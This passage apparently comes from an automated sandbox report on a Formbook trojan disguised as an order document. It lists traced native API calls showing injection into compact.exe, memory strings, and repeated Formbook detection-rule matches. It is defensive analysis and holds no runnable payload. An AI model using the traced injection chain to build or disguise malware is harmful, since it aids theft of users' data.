            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_03602D30
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602D10 NtMapViewOfSection,LdrInitializeThunk,10_2_03602D10
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_03602DF0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602DD0 NtDelayExecution,LdrInitializeThunk,10_2_03602DD0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602C60 NtCreateKey,LdrInitializeThunk,10_2_03602C60
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_03602C70
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_03602CA0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_036035C0 NtCreateMutant,LdrInitializeThunk,10_2_036035C0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_036039B0 NtGetContextThread,LdrInitializeThunk,10_2_036039B0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602B80 NtQueryInformationFile,10_2_03602B80
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602AB0 NtWaitForSingleObject,10_2_03602AB0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602F60 NtCreateProcessEx,10_2_03602F60
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602FA0 NtQuerySection,10_2_03602FA0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602F90 NtProtectVirtualMemory,10_2_03602F90
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602E30 NtWriteVirtualMemory,10_2_03602E30
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602EA0 NtAdjustPrivilegesToken,10_2_03602EA0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602D00 NtSetInformationFile,10_2_03602D00
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602DB0 NtEnumerateKey,10_2_03602DB0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602C00 NtQueryInformationProcess,10_2_03602C00
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602CF0 NtOpenProcess,10_2_03602CF0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602CC0 NtQueryVirtualMemory,10_2_03602CC0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03603010 NtOpenDirectoryObject,10_2_03603010
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03603090 NtSetValueKey,10_2_03603090
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03603D70 NtOpenThread,10_2_03603D70
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03603D10 NtOpenProcessToken,10_2_03603D10
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_02E382E0 NtClose,10_2_02E382E0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_02E38250 NtDeleteFile,10_2_02E38250
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_02E38010 NtCreateFile,10_2_02E38010
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_02E38170 NtReadFile,10_2_02E38170
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_02E38430 NtAllocateVirtualMemory,10_2_02E38430
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014716CC5_2_014716CC
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_014559105_2_01455910
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C99505_2_013C9950
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DB9505_2_013DB950
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0142D8005_2_0142D800
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C38E05_2_013C38E0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147FB765_2_0147FB76
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01435BF05_2_01435BF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DFB805_2_013DFB80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013FDBF95_2_013FDBF9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01477A465_2_01477A46
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147FA495_2_0147FA49
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01433A6C5_2_01433A6C
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0146DAC65_2_0146DAC6
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01405AA05_2_01405AA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01461AA35_2_01461AA3
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0145DAAC5_2_0145DAAC
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01471D5A5_2_01471D5A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01477D735_2_01477D73
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C3D405_2_013C3D40
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013DFDC05_2_013DFDC0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01439C325_2_01439C32
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147FCF25_2_0147FCF2
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147FF095_2_0147FF09
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C1F925_2_013C1F92
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01383FD25_2_01383FD2
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01383FD55_2_01383FD5
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0147FFB15_2_0147FFB1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013C9EB05_2_013C9EB0
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_040770259_2_04077025
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_04078DD99_2_04078DD9
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_04078DE29_2_04078DE2
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_040966829_2_04096682
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_0407F7329_2_0407F732
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_0407F7309_2_0407F730
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_040790029_2_04079002
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_040770829_2_04077082
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_0407725D9_2_0407725D
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368A35210_2_0368A352
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036903E610_2_036903E6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035DE3F010_2_035DE3F0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0367027410_2_03670274
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036502C010_2_036502C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0365815810_2_03658158
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035C010010_2_035C0100
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0366A11810_2_0366A118
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036881CC10_2_036881CC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036901AA10_2_036901AA
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0366200010_2_03662000
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035F475010_2_035F4750
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D077010_2_035D0770
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035CC7C010_2_035CC7C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035EC6E010_2_035EC6E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D053510_2_035D0535
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0369059110_2_03690591
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368244610_2_03682446
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0367442010_2_03674420
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0367E4F610_2_0367E4F6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368AB4010_2_0368AB40
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03686BD710_2_03686BD7
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035CEA8010_2_035CEA80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035E696210_2_035E6962
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0369A9A610_2_0369A9A6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D29A010_2_035D29A0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035DA84010_2_035DA840
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D284010_2_035D2840
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035FE8F010_2_035FE8F0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035B68B810_2_035B68B8
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03644F4010_2_03644F40
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03612F2810_2_03612F28
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03672F3010_2_03672F30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035F0F3010_2_035F0F30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035C2FC810_2_035C2FC8
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035DCFE010_2_035DCFE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0364EFA010_2_0364EFA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D0E5910_2_035D0E59
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368EE2610_2_0368EE26
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368EEDB10_2_0368EEDB
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035E2E9010_2_035E2E90
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368CE9310_2_0368CE93
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035DAD0010_2_035DAD00
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0366CD1F10_2_0366CD1F
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035CADE010_2_035CADE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035E8DBF10_2_035E8DBF
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D0C0010_2_035D0C00
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035C0CF210_2_035C0CF2
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03670CB510_2_03670CB5
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035BD34C10_2_035BD34C
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368132D10_2_0368132D
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0361739A10_2_0361739A
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036712ED10_2_036712ED
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035EB2C010_2_035EB2C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D52A010_2_035D52A0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0369B16B10_2_0369B16B
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0360516C10_2_0360516C
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035BF17210_2_035BF172
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035DB1B010_2_035DB1B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036870E910_2_036870E9
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368F0E010_2_0368F0E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D70C010_2_035D70C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0367F0CC10_2_0367F0CC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368F7B010_2_0368F7B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036816CC10_2_036816CC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368757110_2_03687571
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0366D5B010_2_0366D5B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035C146010_2_035C1460
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368F43F10_2_0368F43F
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368FB7610_2_0368FB76
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03645BF010_2_03645BF0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0360DBF910_2_0360DBF9
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035EFB8010_2_035EFB80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03643A6C10_2_03643A6C
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368FA4910_2_0368FA49
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03687A4610_2_03687A46
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0367DAC610_2_0367DAC6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03615AA010_2_03615AA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03671AA310_2_03671AA3
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0366DAAC10_2_0366DAAC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D995010_2_035D9950
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035EB95010_2_035EB950
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0366591010_2_03665910
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0363D80010_2_0363D800
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D38E010_2_035D38E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368FF0910_2_0368FF09
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D1F9210_2_035D1F92
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368FFB110_2_0368FFB1
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D9EB010_2_035D9EB0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03687D7310_2_03687D73
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D3D4010_2_035D3D40
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03681D5A10_2_03681D5A
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035EFDC010_2_035EFDC0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03649C3210_2_03649C32
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368FCF210_2_0368FCF2
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E21C8010_2_02E21C80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E3A71010_2_02E3A710
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E1CE6710_2_02E1CE67
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E1CE7010_2_02E1CE70
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E1B2EB10_2_02E1B2EB
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E1D09010_2_02E1D090
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E1B11010_2_02E1B110
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E237C010_2_02E237C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E237BE10_2_02E237BE
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_034EA27510_2_034EA275
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_034EB01810_2_034EB018
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_034EBAF410_2_034EBAF4
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_034EBFAD10_2_034EBFAD
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_034EBD7B10_2_034EBD7B
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_034EBC1510_2_034EBC15
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2118662660.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2134444569.000000000CF90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2132983409.00000000077E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2120287530.0000000002791000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2133206549.000000000780A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2133206549.000000000780A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.00000000014AD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMPACT.EXEj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Binary or memory string: OriginalFilenameCAhp.exe> vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, DJO8vVomSf1ydRl3pV.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.cs Security API names: _0020.SetAccessControl
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.cs Security API names: _0020.AddAccessRule
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, DJO8vVomSf1ydRl3pV.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
